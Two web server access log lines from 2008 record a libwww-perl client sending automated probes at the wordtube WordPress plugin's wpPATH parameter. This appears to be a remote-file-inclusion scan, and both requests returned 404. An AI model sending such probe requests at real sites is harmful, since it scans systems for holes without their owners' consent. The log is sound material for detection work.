75.125.140.178 - - [12/Sep/2008:10:31:18 -0700] "GET /logs/access_080616.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:10:31:27 -0700] "GET /logs/access_080807.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
